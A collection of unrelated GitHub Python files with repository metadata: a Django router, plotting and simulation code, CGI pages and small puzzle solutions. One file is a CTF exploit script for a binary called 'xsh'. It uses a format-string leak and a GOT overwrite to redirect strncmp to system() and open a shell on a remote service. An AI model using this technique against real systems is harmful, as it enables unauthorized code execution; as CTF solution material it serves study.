b2d0b95a6c5ee67ad0f1af6a3d34aaa04e489b4c | 25297ce593e7b5d8c7035f5992fd38538e8a4b6d | /ecom/api/order/urls.py | 47d94c48d82bb40e3382f9a0b258f2eae19c2d76 | [] | no_license | abhishek0405/MaskBazaar | fb2d955ba1fc73a8719cf23b3318972ae7455b7c | 71975fc7ab930859786719579821f6100fe7981d | refs/heads/main | 2023-01-07T13:48:14.201049 | 2020-11-22T14:29:21 | 2020-11-22T14:29:21 | 315,051,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 370 | py | from rest_framework import routers
from django.urls import path, include
from . import views
# DRF router for the Order viewset; custom endpoints are listed before
# the router include so they take precedence.
router = routers.DefaultRouter()
# Registered at the empty prefix: this urlconf is already mounted under
# its /api/... path, so no extra segment is needed.
router.register(r'',views.OrderViewSet) #'' as this invoked only when /api/product so no need to add extra
urlpatterns =[
    # Add-to-order endpoint taking the item id and the auth token.
    path('add/<str:id>/<str:token>',views.add,name='order.add'),
    path('',include(router.urls))#the one defined above
]
"abhishekanantharam123@gmail.com"
] | abhishekanantharam123@gmail.com |
923b0ab9979233ab582fe107d680fdaa2f83e04e | f6a639ad7782fa5e05905224e01aeefc7204a66f | /punto_2/animacion.py | 34e80f3465c84af1886dff168d53833977c71bf2 | [] | no_license | Angelicarjs/AngelicaMoreno_taller5 | 16b62ffd750f4ee1fb475e66be359cb63fd58441 | a0cb6164ee6f017f0c67004500d0f48b15e11ee3 | refs/heads/master | 2020-03-12T08:16:02.383897 | 2018-05-14T22:00:53 | 2018-05-14T22:00:53 | 130,523,842 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 271 | py | import numpy as np
import matplotlib.pyplot as plt
from matplotlib import animation
# Load the simulation data (cuerda.txt; row 0 = x values, row 1 = y values)
data = np.loadtxt('cuerda.txt')
x = data[0,:]
y = data[1,:]
fig, ax = plt.subplots()
# Fixed x and y limits for the animation axes
ax.set_xlim(( 0, 100))
ax.set_ylim((-5, 1))
| [
"noreply@github.com"
] | noreply@github.com |
5bfc7e94eef873db0f1be62c6ed282820f1cecc0 | 96cba510d390756372ba32ac8e7893db283f1c22 | /index.py | a14f38f37eb6899a16614fb171649c00ea355912 | [] | no_license | tjdnws1201/web2-python | f71f505ced95352eead5ca26d924535fbdc10542 | a4bf85df37ba2f3944dc9c9576580e501e3c0d37 | refs/heads/master | 2021-01-01T13:29:18.457819 | 2020-02-24T16:30:24 | 2020-02-24T16:30:24 | 239,299,630 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,279 | py | #!python
print("Content-Type: text/html") # HTML is following
print()
import cgi, os, view, html_sanitizer
sanitizer = html_sanitizer.Sanitizer()
# Render the requested wiki page (CGI). The page id comes straight from
# the query string, so it must be constrained to a bare file name.
form = cgi.FieldStorage()
if 'id' in form:
    # SECURITY FIX: basename() strips directory components so a crafted
    # id such as "../../etc/passwd" cannot escape the data/ directory.
    title = pageId = os.path.basename(form["id"].value)
    # Use a context manager so the data file handle is not leaked.
    with open('data/'+pageId,'r') as data_file:
        description = data_file.read()
    title = sanitizer.sanitize(title)
    description = sanitizer.sanitize(description)
    update_link = '<a href="update.py?id={}">update</a>'.format(pageId)
    delete_action = '''
    <form action="process_delete.py" method="post">
        <input type="hidden" name="pageId" value="{}">
        <input type="submit" value="delete">
    </form>
    '''.format(pageId)
else:
    # No id requested: show the welcome page with no edit controls.
    title = pageId = 'Welcome'
    description = 'Hello, web'
    update_link = ''
    delete_action = ''
print('''<!doctype html>
<html>
<head>
    <title>WEB - WELCOME</title>
    <meta charset="utf-8">
</head>
<body>
    <h1><a href="index.py">WEB</a></h1>
    <ol>
        {listStr}
    </ol>
    <a href="create.py">create</a>
    {update_link}
    {delete_action}
    <h2>{title}</h2>
    <p>{desc}</p>
</body>
</html>'''.format(
    title=title,
    desc=description,
    listStr=view.getList(),
    update_link=update_link,
    delete_action=delete_action)
)
"noreply@github.com"
] | noreply@github.com |
2a6ed3ab36186dc4b2907c6eccfff147841622dd | bc28f8fe941caf281261afa1641868e743ecb5ab | /Google_APAC_Round_E/Beautiful_Numbers/Beautiful_Numbers.py | 07ce6d570af05b0e1e80e6cd90d4524fcd142a89 | [] | no_license | anubhavshrimal/CompetitiveProgrammingInPython | 9fc6949fb3cd715cfa8544c17a63ffbe52677b37 | 2692c446d49ec62d4967ed78a7973400db7ce981 | refs/heads/master | 2021-07-05T08:17:15.182154 | 2018-05-29T02:26:25 | 2018-05-29T02:26:25 | 60,554,340 | 7 | 6 | null | 2021-05-24T17:46:16 | 2016-06-06T19:18:27 | Python | UTF-8 | Python | false | false | 465 | py | import numpy as np
# For each test case, pick an answer base from the roots of
# x^2 + x - (num - 1) = 0 (i.e. checks whether num reads "111" in some
# integer base; presumably Google APAC "Beautiful Numbers" — the general
# problem asks for the largest base where num is all 1s).
test = int(input())
for t in range(1, test+1):
    num = int(input())
    # Absolute values of the two roots of x^2 + x - (num - 1)
    n1, n2 = abs(np.roots([1, 1, -(num-1)]))
    if int(n1) != n1 or int(n2)!= n2:
        # No integer root: in base num-1 the number reads "11"
        ans = num-1
    else:
        if n1 == 1 or n1 == -1:
            ans = n2
        elif n2 == 1 or n2 == -1:
            ans = n1
        else:
            # Both roots usable: keep the smaller magnitude
            if n2 > n1:
                ans = n1
            else:
                ans = n2
    print('Case #'+str(t)+':',str(int(ans)))
| [
"anubhavshrimal@gmail.com"
] | anubhavshrimal@gmail.com |
b1671f8ccb003ceab564735e721f938521ca0ce4 | 66edf859b44d1e020bf61f5c1ca3a1d2c0952e2e | /rooters-2019/xsh/exploit.py | 0fc6fbe4ebce1c3def064de17762d48b54086f86 | [] | no_license | farazsth98/CTF | 5f40fe745ad2c6f4697c203532517dc93c88cc08 | d2de238538c112ce1ac3aab939460c03b3f0f732 | refs/heads/master | 2023-04-13T20:29:09.611005 | 2021-04-24T17:53:05 | 2021-04-24T17:53:05 | 216,312,857 | 8 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,225 | py | #!/usr/bin/env python2
from pwn import *
# Load the target binary and the local libc for symbol/offset lookups.
elf = ELF('./xsh')
libc = ELF('./libc.so.6')
def start():
    """Open the target and return a pwntools tube.

    Local runs spawn ./xsh; REMOTE runs connect to the CTF service.
    Also rebinds the module-level *libc* to the matching build.
    BUG FIX: the original placed the libc assignments AFTER the return
    statements, so they were unreachable (and local to the function),
    meaning the remote libc was never loaded.
    """
    global libc
    if not args.REMOTE:
        libc = ELF('./libc.so.6')
        return process('./xsh')
    else:
        libc = ELF('./libc-remote.so.6')
        return remote('35.192.206.226', 5555)
def execute(cmd):
    """Send *cmd* over the global tube *p* and return the output read
    up to (and including) the next '$' prompt."""
    p.recv()
    p.sendline(cmd)
    return p.recvuntil('$')
context.terminal = ['tmux', 'new-window']
p = start()
if args.GDB:
    gdb.attach(p)
# Get base address of binary
# (%3$x leaks a code pointer sitting 0x1249 above the PIE base)
leak = execute('echo 0x%3$x')[:10]
elf.address = int(leak, 16) - 0x1249
strncmp_got = elf.got['strncmp']
system = elf.plt['system']
log.info('PIE base: ' + hex(elf.address))
log.info('strncmp_got: ' + hex(strncmp_got))
log.info('system: ' + hex(system))
# Prepare to write system to strncmp_got
# Calculate each half of the address
# This is to prevent the exploit from taking way too long to write a huge address
first = int('0x' + hex(system)[-4:], 16)
second = int(hex(system)[:6], 16)
# Do the format string overwrite
# Two 2-byte %n writes via positional args 24/25; the "-4-3" presumably
# compensates for bytes already printed before the first %n — verify
# against the binary's stack layout.
payload = 'echo' + p32(strncmp_got) + p32(strncmp_got+2)
payload += '%{}c%24$n%{}c%25$n'.format(first-4-3, second-first)
execute(payload)
# Execute /bin/sh for shell
# strncmp now resolves to system(), so the next "command" runs as system("/bin/sh")
p.recv()
p.sendline('/bin/sh')
p.interactive()
| [
"faraz.abrar9@gmail.com"
] | faraz.abrar9@gmail.com |
7054d92c14a1e6c568fc15281f3341cce89ae817 | 4c2136ab05913beba890b4127c2f608be4798ed2 | /(0, '')/py/fc_session.py | 751c6d3892c8e00fd0baf22a85673c65224e1427 | [] | no_license | Dyutee/test | 345adcd1769cba0f468090bcc311f4d379ea5f1e | b8b3718922bafbac1bad3802f6c885d777e1bb08 | refs/heads/master | 2021-01-12T04:19:45.511927 | 2016-12-29T07:25:29 | 2016-12-29T07:25:29 | 77,588,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,517 | py | #!/usr/bin/python
import cgitb, sys, header, common_methods
cgitb.enable()
sys.path.append('/var/nasexe/storage')
import storage_op
import sys,os
from lvm_infos import *
from functions import *
import san_disk_funs
# Query FC target status and the list of FC targets from the SAN helpers.
check_fc = san_disk_funs.fc_target_status();
fc_target=san_disk_funs.fc_list_targets()
fc_ip = ''
ses = ''
########### FC Session ##########################
# NOTE(review): this loop keeps only the LAST target's session info in
# `ses`; the per-target lookup is repeated in the rendering loop below.
for session_tar in fc_target:
    #print 'Session Target:'+str(session_tar)
    #print '<br/>'
    #print 'Sess Tar:'+str(session_tar)
    #print '<br/>'
    ses=san_disk_funs.fc_session(session_tar)
    #print 'FC SESSION Info:'+str(sess)
import left_nav
#if (str(check_fc).find("'1'") > 0):
# Render the FC session table (Python 2 CGI) when the FC target service
# is up; otherwise tell the admin to enable FC on the Services page.
if (check_fc !=[]):
    print
    print """
    <!--Right side body content starts from here-->
    <div class="rightsidecontainer">
    <div class="insidepage-heading">Fc >> <span class="content">Fc Session Information</span></div>
    <!--tab srt-->
    <div class="searchresult-container">
    <div class="infoheader">
    <div id="tabs">
    <ul>
    <li><a href="#tabs-1">Fc Session</a></li>
    </ul>
    <div id="tabs-1">
    <!--form container starts here-->
    <div class="form-container">
    <div class="topinputwrap-heading">Fc Session Information </div>
    <div class="inputwrap">
    <div class="formrightside-content">
    <form name = 'add_info' method = 'POST'>
    <table width = "680" border = "1" cellspacing = "0" cellpadding = "0" name = 'disp_tables' id = 'id_target_info' style ="border-style:ridge;">"""
    print"""<tr style = 'background-color:#999999; font-weight: bold;'>
    <td height = "35px" valign = "middle" style = 'color: #FFF;'>Fc Target</td>
    <td height = "35px" valign = "middle" style = 'color: #FFF;'>Connected Client</td>
    </tr>"""
    #print fc_target
    # One table row per FC target, showing its connected client session.
    if(ses !=''):
        for tar_info in fc_target:
            print"""<tr>
            <!--<td class = "table_content" height = "35px" valign = "middle">
            <a href = 'main.php?page=iscsi&act=add_disk_tgt_done&target=<?= $show_targets ?>'><img border = '0' style = 'margin-top: 2px;' src = '../images/add.png' title = 'Add disk to target' /></a>&nbsp;&nbsp;<a href = 'main.php?page=iscsi&act=del_disk_tgt_done&t=<?= $show_targets ?>'><img border = '0' src = '../images/fileclose.png' title = 'Remove disk from target' /></a>&nbsp;&nbsp;<a href = 'get_properties.php?target=<?= $show_targets ?>'><img border = '0' src = '../images/properties.png' title = 'Target properties' /></a>&nbsp;&nbsp;</td>-->
            <td class = "table_content" height = "35px" valign = "middle">"""
            print"""&nbsp;<font color ="darkred"><b>"""+tar_info+"""</b></font>"""
            print """</td>"""
            print"""<td class = "table_content" height = "35px" valign = "middle" style="font-family: Tahoma;text-decoration:blink;">"""
            # Strip list punctuation from the session repr for display.
            sesion_tar =sess=san_disk_funs.fc_session(tar_info)
            replace_sess_nm = str(sesion_tar).replace('[]', '')
            replace_sess_nm1 = str(replace_sess_nm).replace('[', '')
            replace_sess_nm2 = str(replace_sess_nm1).replace(']', '')
            replace_session_name = str(replace_sess_nm2).replace("'", '')
            #print replace_session_name
            if(replace_session_name!=''):
                print"""<font color = 'darkgreen'><b>"""+replace_session_name+"""</b></font></td>"""
            else:
                print """
                <marquee behavior="alternate" direction ="right"><b><font size="3">There is no Session for this client</font></b></marquee>
                </td>
                """
    else:
        print"""<tr>
        <td colspan = '3' align = 'center' height="50px;">
        <marquee behavior="alternate" direction= "right"><b><font size="5">No Information is available</font></b></marquee>
        </td>
        </tr>"""
    print"""
    </table>
    </form>
    </div>"""
    print"""
    </div>
    </div>
    <!--form container ends here-->
    </div>
    </div>
    </div>
    </div>
    <!--form container ends here-->
    <!--form container starts here-->
    <!--form container ends here-->
    </div>
    <!--Right side body content ends here-->
    </div>
    <!--Footer starts from here-->
    <div class="insidefooter footer_content">&copy; 2013 Opslag FS2</div>
    <!-- Footer ends here-->
    </div>
    <!--inside body wrapper end-->
    </div>"""
else:
    print "<div style = 'margin-left: auto; margin-right: auto; text-align: center; vertical-align: center; color: darkred; width: 65%; font: 16px Arial;'><br/><br/><br/><b>Check the 'Enable/Disable FC' option in Maintenance -></b><a href= 'main.py?page=sr'><span style='text-decoration:underline;'>Services</span></a>.</div>"
print"""
<!--body wrapper end-->
</body>
</html>
"""
| [
"dyuteemoy46@gmail.com"
] | dyuteemoy46@gmail.com |
686ebbced947976bbb1149d1b104178043ff8612 | aafb41aab45562dfe08b2f142025a670dc4c5b80 | /scripts/ffhs-na-semesterarbeit/utils/utils.py | 376cc2c16a15cfccf108bd3c70e5d083df74c7b1 | [] | no_license | samuelblattner/ffhs-na-semesterarbeit | 1a61b55b60793557dd9b5d3b9ab025e8869fcbbd | c59d878806ab53fbc91b8861e820c1956f344fb3 | refs/heads/master | 2020-04-09T23:39:09.285217 | 2018-12-06T22:41:47 | 2018-12-06T22:41:47 | 160,662,796 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,179 | py | from random import random
from typing import Tuple, List, Dict
from dateutil import parser
# English names of European countries — presumably used elsewhere in the
# project to restrict the flight network to European airports (it is not
# referenced within this module's visible code).
EUROPEAN_COUNTRIES = (
    'Albania',
    'Andorra',
    'Austria',
    'Belarus',
    'Belgium',
    'Bosnia and Herzegovina',
    'Bulgaria',
    'Croatia',
    'Czech Republic',
    'Denmark',
    'Estonia',
    'Finland',
    'France',
    'Germany',
    'Greece',
    'Hungary',
    'Iceland',
    'Ireland',
    'Italy',
    'Latvia',
    'Liechtenstein',
    'Lithuania',
    'Luxembourg',
    'Malta',
    'Moldova',
    'Monaco',
    'Netherlands',
    'Norway',
    'Poland',
    'Portugal',
    'Romania',
    'Russia',
    'San Marino',
    'Serbia',
    'Slovakia',
    'Slovenia',
    'Spain',
    'Sweden',
    'Switzerland',
    'Ukraine',
    'United Kingdom',
)
import sys
from datetime import datetime, timedelta
from math import radians, atan2, sqrt, cos, sin
import networkx as nx
from dateutil.tz import gettz
def calculate_distance_from_coordinates(lat1, lng1, lat2, lng2):
    """Great-circle (haversine) distance in kilometres between two
    points given as decimal-degree latitude/longitude pairs.

    Uses a mean Earth radius of 6371 km.
    """
    earth_radius_km = 6371.0
    phi1, lam1, phi2, lam2 = (radians(v) for v in (lat1, lng1, lat2, lng2))
    dphi = phi2 - phi1
    dlam = lam2 - lam1
    # Haversine term; always within [0, 1] so the sqrt below is safe.
    h = sin(dphi / 2) ** 2 + cos(phi1) * cos(phi2) * sin(dlam / 2) ** 2
    central_angle = 2 * atan2(sqrt(h), sqrt(1 - h))
    return earth_radius_km * central_angle
def calculate_flight_duration_per_distance(network: nx.MultiDiGraph):
    """Estimate the network-wide mean flight duration per kilometre.

    For every non-loop edge, divides its 'duration' attribute by the
    great-circle distance between the endpoint airports and returns the
    mean of those ratios. Elsewhere in this module 'duration' is stored
    in seconds, so the result is seconds per km.
    """
    durations_per_km = []
    for from_airport in network.nodes():
        for f, t, k in network.out_edges(from_airport, keys=True):
            # Skip self-loops: zero distance would divide by zero.
            if f == t:
                continue
            from_data = network.nodes[f]
            to_data = network.nodes[t]
            try:
                dist = calculate_distance_from_coordinates(
                    from_data.get('latitude'),
                    from_data.get('longitude'),
                    to_data.get('latitude'),
                    to_data.get('longitude'),
                )
            except:
                # NOTE(review): bare except silently skips airports with
                # missing/None coordinates, but also hides unrelated bugs.
                continue
            flight_time = network.edges[f, t, k].get('duration')
            # NOTE(review): dist == 0 for distinct airports sharing
            # coordinates is not guarded and would raise here.
            durations_per_km.append(flight_time / dist)
    # NOTE(review): raises ZeroDivisionError when no usable edge exists.
    return sum(durations_per_km) / len(durations_per_km)
def calculate_hub_attachment_likelihood(network: nx.MultiDiGraph, from_airport, to_airport):
    """Attachment probability biased toward already-connected pairs.

    Mixes (50/50) a uniform term 1/N with a term proportional to the
    number of existing links between the two airports (both directions),
    normalised by 1 + out-degree of *from_airport*.
    """
    mix = 0.5

    def link_count(a, b):
        # Number of parallel a->b edges in the multigraph (0 when absent).
        data = network.get_edge_data(a, b)
        return len(data) if data else 0

    existing = link_count(from_airport, to_airport) + link_count(to_airport, from_airport)
    out_degree = len(network.out_edges(from_airport))
    return mix * 1 / network.number_of_nodes() + (1 - mix) * existing / (1 + out_degree)
def calculate_hub_neighbor_attachment_likelihood(network, from_airport, to_airport):
    """Attachment probability favouring pairs that share a strong hub.

    A 20% uniform-random term plus an 80% term proportional to the
    strongest shared hub's link share, damped by (1 + existing direct
    routes)^5 so already-direct pairs are rarely chosen again.
    """
    p = 0.2
    # Find hubs that connect from and to airports
    from_neighbors = set([t for f, t, k in network.out_edges(from_airport, keys=True)])
    to_neighbors = set([t for f, t, k in network.out_edges(to_airport, keys=True)])
    common_hubs = from_neighbors.intersection(to_neighbors)
    random_connectivity = p * 1/network.number_of_nodes()
    # No shared hub: only the uniform-random component remains.
    if len(common_hubs) == 0:
        return random_connectivity
    # Strength of each shared hub = parallel links to/from from_airport.
    all_to_hub_strengths = []
    for common_hub in common_hubs:
        num_links1 = network.get_edge_data(from_airport, common_hub)
        num_links1 = len(num_links1) if num_links1 else 0
        num_links2 = network.get_edge_data(common_hub, from_airport)
        num_links2 = len(num_links2) if num_links2 else 0
        all_to_hub_strengths.append((
            num_links1 + num_links2,
            common_hub
        ))
    # Keep the single strongest hub (ties broken by sort stability).
    strength, strongest_hub = sorted(all_to_hub_strengths, key=lambda hn: hn[0], reverse=True)[0]
    # Count existing direct routes between the pair, both directions.
    existing_direct_routes1 = network.get_edge_data(from_airport, to_airport)
    existing_direct_routes1 = len(existing_direct_routes1) if existing_direct_routes1 else 0
    existing_direct_routes2 = network.get_edge_data(to_airport, from_airport)
    existing_direct_routes2 = len(existing_direct_routes2) if existing_direct_routes2 else 0
    existing_direct_routes = existing_direct_routes1 + existing_direct_routes2
    neighbor_connectivity = (1-p) * (1 / ((1 + existing_direct_routes)**5)) * (strength / sum([s[0] for s in all_to_hub_strengths]))
    return random_connectivity + neighbor_connectivity
def calculate_non_hub_connectivity(network: nx.MultiDiGraph, from_airport, to_airport):
    """Attachment probability that favours poorly-connected targets.

    20% uniform term plus an 80% term decaying with the square of the
    target's (degree + 1), so low-degree airports are most attractive.
    *from_airport* is unused but kept for a signature consistent with
    the other likelihood functions in this module.
    """
    mix = 0.2
    uniform_part = mix * 1 / network.number_of_nodes()
    anti_hub_part = (1 - mix) * 1 / ((network.degree(to_airport) + 1) ** 2)
    return uniform_part + anti_hub_part
def grow_traffic_by_x_years(network: nx.MultiDiGraph, years, growth_rate, duration_per_km, preferential_attachment=None):
    """Add flights to *network* in place to simulate compound growth.

    The target edge count is len(edges) * growth_rate**years; the
    missing edges are distributed over airport pairs according to
    *preferential_attachment*:
      - 'HUB':      favour already well-connected pairs
      - 'NEIGHBOR': favour pairs sharing a strong common hub
      - 'NONHUB':   favour poorly connected target airports
      - None:       attach unconditionally while sweeping all pairs
    New flights get a pseudo-random departure slot (hour 5-19, minutes
    in 5-min steps) interpreted in the departure airport's timezone and
    converted via astimezone(), and a 'duration' in seconds derived from
    great-circle distance * duration_per_km. Progress goes to stdout.
    """
    num_of_edges = len(network.edges)
    prospect_num_of_edges = num_of_edges * (growth_rate**years)
    num_additional_edges = int(prospect_num_of_edges) - num_of_edges
    # Symmetric great-circle distance cache, keyed DIST_CACHE[a][b].
    DIST_CACHE = {}
    num_distributed_new_edges = 0
    while num_distributed_new_edges < num_additional_edges:
        for fn, from_airport in enumerate(network.nodes()):
            if num_distributed_new_edges >= num_additional_edges:
                return
            sys.stdout.write('\rDistributed: {} of {} new links'.format(num_distributed_new_edges, num_additional_edges))
            for to_airport in network.nodes():
                if num_distributed_new_edges >= num_additional_edges:
                    return
                # Avoid connections to self
                if from_airport == to_airport:
                    continue
                if preferential_attachment == 'HUB':
                    p = calculate_hub_attachment_likelihood(network, from_airport, to_airport)
                    if random() > p:
                        continue
                elif preferential_attachment == 'NEIGHBOR':
                    p = calculate_hub_neighbor_attachment_likelihood(network, from_airport, to_airport)
                    if random() > p:
                        continue
                elif preferential_attachment == 'NONHUB':
                    p = calculate_non_hub_connectivity(network, from_airport, to_airport)
                    if random() > p:
                        continue
                from_airport_obj = network.nodes[from_airport]
                to_airport_obj = network.nodes[to_airport]
                # Check existing connections between the airports.
                # If there are any, we can just use their flight duration.
                for ef, et, ek in network.out_edges([from_airport, to_airport], keys=True):
                    # BUG FIX: the reverse-direction test previously read
                    # "et == to_airport" (a self-loop) instead of matching
                    # the opposite-direction edge back to from_airport.
                    if ef == from_airport and et == to_airport or ef == to_airport and et == from_airport:
                        # BUG FIX: edge 'duration' is stored in seconds but
                        # was reused directly as minutes; convert first.
                        flight_duration_in_min = int(network.edges[ef, et, ek].get('duration') / 60)
                        break
                # If no connections exist yet
                else:
                    distance = DIST_CACHE.get(from_airport, {}).get(to_airport, None)
                    if distance is None:
                        distance = calculate_distance_from_coordinates(
                            lat1=from_airport_obj.get('latitude'),
                            lng1=from_airport_obj.get('longitude'),
                            lat2=to_airport_obj.get('latitude'),
                            lng2=to_airport_obj.get('longitude')
                        )
                        # BUG FIX: setdefault(a, {b: d}) only took effect for
                        # an airport's first pair, so later distances were
                        # computed but never cached; store per-pair instead.
                        DIST_CACHE.setdefault(from_airport, {})[to_airport] = distance
                        DIST_CACHE.setdefault(to_airport, {})[from_airport] = distance
                    flight_duration_in_min = int(distance * duration_per_km / 60)
                utc_dep_time = datetime.strptime('{}:{}:00'.format(5 + int(15 * random()), int(12*random()) * 5), '%H:%M:%S').replace(
                    tzinfo=gettz(network.nodes[from_airport].get('timezone'))).astimezone()
                utc_arr_time = utc_dep_time + timedelta(minutes=flight_duration_in_min)
                network.add_edge(from_airport, to_airport, **{
                    'departureTimeUTC': utc_dep_time.strftime('%H:%M:%S'),
                    'arrivalTimeUTC': utc_arr_time.strftime('%H:%M:%S'),
                    'duration': flight_duration_in_min * 60
                })
                num_distributed_new_edges += 1
def create_flight_departures_arrivals_index(network) -> Tuple[Dict, Dict]:
    """
    Creates two indices where arrivals and departures are collected by minute.
    This helps to prevent the simulation from analyzing all flights for every
    simulation step (minute) and thus reduces total simulation time greatly.

    Keys are minutes-since-midnight UTC (0..1439); each value maps a
    unique edge id '{from}{to}{key}' to (edge_data, from_airport,
    to_airport). Every edge is visited from both endpoints, but the
    inner setdefault keeps only the first occurrence.

    :param network: graph whose edges carry 'departureTimeUTC' and
        'arrivalTimeUTC' strings parseable by dateutil.
    :return: (departure_index, arrival_index)
    """
    dep_index = {}
    arr_index = {}
    # (An unused 'ins' debug counter was removed from the original.)
    for node in network.nodes():
        for f, t, k in network.out_edges(node, keys=True):
            outbound_flight_data = network.edges[f, t, k]
            scheduled_departure_utc = parser.parse(outbound_flight_data['departureTimeUTC']).time()
            scheduled_departure_utc = scheduled_departure_utc.hour * 60 + scheduled_departure_utc.minute
            dep_index.setdefault(scheduled_departure_utc, {}).setdefault(
                '{}{}{}'.format(f, t, k),
                (outbound_flight_data, f, t)
            )
        for f, t, k in network.in_edges(node, keys=True):
            inbound_flight_data = network.edges[f, t, k]
            scheduled_arrival_utc = parser.parse(inbound_flight_data['arrivalTimeUTC']).time()
            scheduled_arrival_utc = scheduled_arrival_utc.hour * 60 + scheduled_arrival_utc.minute
            arr_index.setdefault(scheduled_arrival_utc, {}).setdefault(
                '{}{}{}'.format(f, t, k),
                (inbound_flight_data, f, t)
            )
    return dep_index, arr_index
def create_airport_capacity_load_index(network, capacity_factor=1.2):
    """Derive per-airport hourly capacity limits and an all-zero load map.

    For each airport, counts scheduled movements (departures plus
    arrivals) per UTC hour and takes the busiest hour scaled by
    *capacity_factor* as that airport's capacity; airports with no
    flights get a capacity of 0.

    :param network: graph whose edges carry 'departureTimeUTC' and
        'arrivalTimeUTC' strings parseable by dateutil.
    :param capacity_factor: headroom multiplier over the busiest hour.
    :return: (capacity_index, load_index), both keyed by airport id;
        the load index starts at 0 for every airport.
    """
    cap_index = {}
    load_index = {}
    for airport in network.nodes():
        cap_index.setdefault(airport, {})
        for f, t, k in network.out_edges(airport, keys=True):
            outbound_flight_data = network.edges[f, t, k]
            scheduled_departure_utc = parser.parse(outbound_flight_data['departureTimeUTC']).time()
            cap_index[airport].setdefault(scheduled_departure_utc.hour, 0)
            cap_index[airport][scheduled_departure_utc.hour] += 1
        for f, t, k in network.in_edges(airport, keys=True):
            inbound_flight_data = network.edges[f, t, k]
            scheduled_arrival_utc = parser.parse(inbound_flight_data['arrivalTimeUTC']).time()
            cap_index[airport].setdefault(scheduled_arrival_utc.hour, 0)
            cap_index[airport][scheduled_arrival_utc.hour] += 1
        max_cap = max(cap_index[airport].values()) if cap_index[airport].values() else 0
        # Removed leftover debug prints that dumped details for the
        # hard-coded airport id '9908'.
        cap_index[airport] = capacity_factor * max_cap
        load_index[airport] = 0
    return cap_index, load_index
def transform_to_random(network, duration_per_km=4.5):
    """Build a randomised copy of *network* with the same airports and
    the same total number of flights.

    Every flight is re-assigned to a uniformly random ordered pair of
    distinct airports. The original departure time is kept; the arrival
    time is recomputed from the new pair's great-circle distance times
    *duration_per_km* (seconds per km), matching the edge format used
    elsewhere in this module ('duration' stored in seconds).
    """
    transformed = nx.MultiDiGraph()
    all_nodes_keys = list(network.nodes().keys())
    # Symmetric great-circle distance cache, keyed DIST_CACHE[a][b].
    # (Unused num_edges/num_edges_added counters were removed.)
    DIST_CACHE = {}
    for node in network.nodes():
        transformed.add_node(node, **network.nodes[node])
    for f, t, k in network.edges:
        # Select a random ordered pair of distinct airports.
        from_airport = to_airport = -1
        while from_airport == to_airport:
            from_airport = all_nodes_keys[int(random() * len(all_nodes_keys))]
            to_airport = all_nodes_keys[int(random() * len(all_nodes_keys))]
        from_airport_obj = network.nodes[from_airport]
        to_airport_obj = network.nodes[to_airport]
        # Calculate distance and flight duration between them.
        distance = DIST_CACHE.get(from_airport, {}).get(to_airport, None)
        if distance is None:
            distance = calculate_distance_from_coordinates(
                lat1=from_airport_obj.get('latitude'),
                lng1=from_airport_obj.get('longitude'),
                lat2=to_airport_obj.get('latitude'),
                lng2=to_airport_obj.get('longitude')
            )
            # BUG FIX: setdefault(a, {b: d}) only populated the cache on an
            # airport's first pairing; store each pair's distance instead.
            DIST_CACHE.setdefault(from_airport, {})[to_airport] = distance
            DIST_CACHE.setdefault(to_airport, {})[from_airport] = distance
        flight_duration_in_min = int(distance * duration_per_km / 60)
        # Keep the flight's original departure time (not re-randomised).
        utc_dep_time = parser.parse(network.edges[f, t, k]['departureTimeUTC'])
        # Calculate arrival time from the new distance.
        utc_arr_time = utc_dep_time + timedelta(minutes=flight_duration_in_min)
        # Add flight to new network.
        transformed.add_edge(
            from_airport,
            to_airport,
            **{
                'departureTimeUTC': utc_dep_time.strftime('%H:%M:%S'),
                'arrivalTimeUTC': utc_arr_time.strftime('%H:%M:%S'),
                'duration': flight_duration_in_min * 60
            }
        )
    return transformed
| [
"samworks@gmx.net"
] | samworks@gmx.net |
e139bb21e3e65931f79037851b518967a20f1bdf | 6ce7ec83576e8021d050f86cd4c696a142f1798a | /final_exam/02.problem.py | 3bca39f6d99a95ed5fcbb067e335e57b32331afe | [] | no_license | Nanko-Nanev/fundamentals | 2707e20900dc779b96d453c978e8e74f1fb86fa4 | f46a655ff32bbfe6f3afeb4f3ab1fddc7a0edc89 | refs/heads/main | 2023-02-09T18:39:55.305854 | 2021-01-07T10:30:37 | 2021-01-07T10:30:37 | 326,507,304 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 470 | py | import re
pattern = r"^(\$|%)(?P<tag>[A-Z]{1}[a-z]+)\1:\s\[(?P<t1>[0-9]+)\]\|\[(?P<t2>[0-9]+)\]\|\[(?P<t3>[0-9]+)\]\|"
n = int(input())
for i in range(n):
data = input()
result = re.match(pattern, data)
if result:
obj = result.groupdict()
tag = (obj['tag'])
a = chr(int(obj['t1']))
b = chr(int(obj['t2']))
c = chr(int(obj['t3']))
print(f"{tag}: {a}{b}{c}")
else:
print(f"Valid message not found!") | [
"75886522+Nanko-Nanev@users.noreply.github.com"
] | 75886522+Nanko-Nanev@users.noreply.github.com |
a6fd335e1fab30bfd003446f4f96dc56ec322e38 | 0c08d190ebf4ac4469f1e5931171b84916d0ada8 | /Assignment 2/Static Slicing/main.py | a530f3e9d4e7431ada82f1bd3fc7b4aedfe992c5 | [] | no_license | Janahan10/SOFE-3980-Assignments | 95ef56c01c02a1125fcddb1b9ad58b376cf0066f | a2830b4da3f110e82e031384f46a5200809ab154 | refs/heads/main | 2023-03-30T22:15:41.680013 | 2021-03-28T17:42:44 | 2021-03-28T17:42:44 | 343,180,490 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 325 | py | #!/usr/bin/python
import sys
def parse(statement, cur_line):
    """Return True when *statement* occurs as a substring of *cur_line*."""
    return statement in cur_line
file = open("Source.txt", "r")
line_number = 1
for line in file:
if parse(sys.argv[1], line):
print('line ', line_number, ':', line.strip())
line_number += 1
file.close()
| [
"janahanravi10@gmail.com"
] | janahanravi10@gmail.com |
